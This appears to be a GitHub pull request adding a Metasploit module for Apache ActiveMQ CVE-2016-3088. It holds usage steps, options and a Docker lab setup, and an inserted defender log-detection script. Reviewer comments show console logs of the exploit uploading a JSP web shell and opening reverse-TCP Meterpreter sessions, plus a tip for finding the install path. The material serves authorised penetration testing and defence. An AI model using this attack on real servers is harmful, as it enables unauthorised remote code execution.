
Added module to exploit ActiveMQ; CVE-2016-3088 #8519

Merged
merged 1 commit into from Jun 28, 2017

Conversation

@imander imander commented Jun 6, 2017

Description

This module exploits a vulnerability in Apache ActiveMQ 5.x before 5.14.0 which allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request. By default, a JSP web shell and Java Meterpreter payload are uploaded to the '/fileserver/' path of a vulnerable server, then moved via an HTTP MOVE request to either '/api/' or '/admin/'.

Vulnerable Application

Apache ActiveMQ is a popular open source message broker and integration patterns server which implements Java Message Service (JMS) 1.1.

Source and Installers

Testing with Docker

The easiest way to quickly spin up an ActiveMQ server to test with Metasploit is to install Docker, then pull and launch a vulnerable ActiveMQ image from the Docker Hub. For example:

# Pull ActiveMQ 5.11.0 from the Hub
docker pull rmohr/activemq:5.11.0
# Launch the container with webserver running on port 8161
docker run -p 61616:61616 -p 8161:8161 rmohr/activemq:5.11.0

Verification Steps

  1. Start msfconsole
  2. Do: use exploit/multi/http/apache_activemq_upload_jsp
  3. Do: set rhost [IP]
  4. Do: run
  5. You should get a session

Basic Options

AutoCleanup
Remove web shells from the target system after callback is received (Default: true)

BasicAuthUser
User-supplied username (Default: admin)

BasicAuthPass
User-supplied password associated with username (Default: admin)

JSP
Desired name to assign to the JSP web shell when it is uploaded to the target system. Do not include the .jsp extension (Default: randomly-generated string)

Advanced Options

UploadPath
Custom path into which web shells will be uploaded on the target system. If the user determines that a nonstandard directory is able to execute .jsp files, the user can specify this directory for exploitation (Default: attempt /api/; if that fails, attempt /admin/)
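
Defender-side detection for the PUT-then-MOVE sequence the description above names. This is an added example, not part of the pull request or of the Metasploit module: it parses NCSA-style access-log lines (the sample lines are constructed, not real traffic), flags a client that PUTs a file into /fileserver/ and then issues MOVE on that same path, and records a later request for the same file name under /api/ or /admin/, the two destinations the module tries. A second helper classifies a version string against the "5.x before 5.14.0" range stated in the description. The function names, the log format and the sample addresses are assumptions.

```python
import re

# Constructed sample access-log lines in NCSA common log format (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [06/Jun/2017:12:00:01 -0500] "GET /admin/ HTTP/1.1" 401 0
10.0.0.9 - - [06/Jun/2017:12:00:05 -0500] "PUT /fileserver/abc123.jsp HTTP/1.1" 204 0
10.0.0.9 - - [06/Jun/2017:12:00:06 -0500] "MOVE /fileserver/abc123.jsp HTTP/1.1" 204 0
10.0.0.9 - - [06/Jun/2017:12:00:08 -0500] "GET /api/abc123.jsp HTTP/1.1" 200 512
10.0.0.7 - - [06/Jun/2017:12:01:00 -0500] "PUT /fileserver/notes.txt HTTP/1.1" 204 0
10.0.0.7 - - [06/Jun/2017:12:01:30 -0500] "GET /fileserver/notes.txt HTTP/1.1" 200 40
"""

# Assumed log layout: client, ident, user, [timestamp], "METHOD path proto", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Split one access-log line into ip, timestamp, method, path and status, or None."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_fileserver_moves(log_text):
    """Flag clients that PUT a file into /fileserver/ and then MOVE that same path.

    The MOVE destination travels in the WebDAV Destination header, which a plain
    access log does not record, so the rule keys on the source path and then
    watches for a later request for the same file name under /api/ or /admin/.
    """
    pending = {}   # (ip, path) -> timestamp of the PUT
    moved = {}     # (ip, basename) -> index into alerts
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        key = (rec["ip"], rec["path"])
        basename = rec["path"].rsplit("/", 1)[-1]
        if rec["method"] == "PUT" and rec["path"].startswith("/fileserver/"):
            pending[key] = rec["ts"]
        elif rec["method"] == "MOVE" and key in pending:
            alerts.append({"ip": rec["ip"], "path": rec["path"],
                           "put_at": pending.pop(key), "move_at": rec["ts"],
                           "accessed": None})
            moved[(rec["ip"], basename)] = len(alerts) - 1
        elif (rec["ip"], basename) in moved and (
                rec["path"].startswith("/api/") or rec["path"].startswith("/admin/")):
            # The moved file was requested from a servlet-backed directory.
            alerts[moved[(rec["ip"], basename)]]["accessed"] = rec["path"]
    return alerts


def is_affected_version(version):
    """True for ActiveMQ 5.x releases before 5.14.0, the range named in the description."""
    parts = [int(p) for p in version.split(".")]
    major = parts[0]
    minor = parts[1] if len(parts) > 1 else 0
    return major == 5 and minor < 14


if __name__ == "__main__":
    for alert in find_fileserver_moves(SAMPLE_LOG):
        print(alert)
    for v in ("5.9.1", "5.11.0", "5.14.0"):
        print(v, "affected" if is_affected_version(v) else "not affected")
```

The plain PUT from 10.0.0.7 is left alone on purpose: writes into /fileserver/ are the documented behaviour of that servlet, and the signal here is the MOVE out of it. A reverse proxy or WAF that logs request headers can check the Destination header directly instead of correlating on the file name.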

@wvu wvu self-assigned this Jun 6, 2017
@brandonprry (Contributor) commented

This works for me.

msf > use exploit/multi/http/apache_activemq_upload_jsp 
msf exploit(apache_activemq_upload_jsp) > set RHOST 192.168.56.102
RHOST => 192.168.56.102
msf exploit(apache_activemq_upload_jsp) > exploit

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Uploading http://192.168.56.102:8161/opt/activemq/webapps/api/thboHOqElR.jar
[*] Uploading http://192.168.56.102:8161/opt/activemq/webapps/api/thboHOqElR.jsp
[*] Sending stage (49667 bytes) to 192.168.56.102
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.102:32816) at 2017-06-24 12:25:49 -0500
[+] Deleted /opt/activemq/webapps/api/thboHOqElR.jar
[+] Deleted /opt/activemq/webapps/api/thboHOqElR.jsp

meterpreter > getuid
Server username: activemq
meterpreter > 

@wvu wvu (Contributor) commented Jun 28, 2017

This module is basically flawless, @imander. Good work.

One thing to note is that the file upload is actually pre-auth, but to get the install path, you need to obtain it some other way. Good call hitting /admin/test/systemProperties.jsp.

That was the missing puzzle piece when I tested this vuln last year, since I was trying for an exclusively pre-auth exploit.

@wvu wvu (Contributor) commented Jun 28, 2017

msf exploit(apache_activemq_upload_jsp) > run

[*] Started reverse TCP handler on 192.168.33.1:4444 
[*] Uploading http://192.168.33.129:8161/home/[redacted]/apache-activemq-5.9.1/webapps/api/YcCnMUPPV.jar
[*] Uploading http://192.168.33.129:8161/home/[redacted]/apache-activemq-5.9.1/webapps/api/YcCnMUPPV.jsp
[*] Sending stage (50783 bytes) to 192.168.33.129
[*] Meterpreter session 1 opened (192.168.33.1:4444 -> 192.168.33.129:49550) at 2017-06-28 15:02:13 -0500
[+] Deleted /home/[redacted]/apache-activemq-5.9.1/webapps/api/YcCnMUPPV.jar
[+] Deleted /home/[redacted]/apache-activemq-5.9.1/webapps/api/YcCnMUPPV.jsp

meterpreter > 

@wvu wvu merged commit d641058 into rapid7:master Jun 28, 2017
wvu added a commit that referenced this pull request Jun 28, 2017
@wvu wvu (Contributor) commented Jun 29, 2017

Release Notes

The exploits/multi/http/apache_activemq_upload_jsp module has been added to the framework. This module exploits a vulnerability in Apache ActiveMQ 5.x before 5.14.0 that allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request.
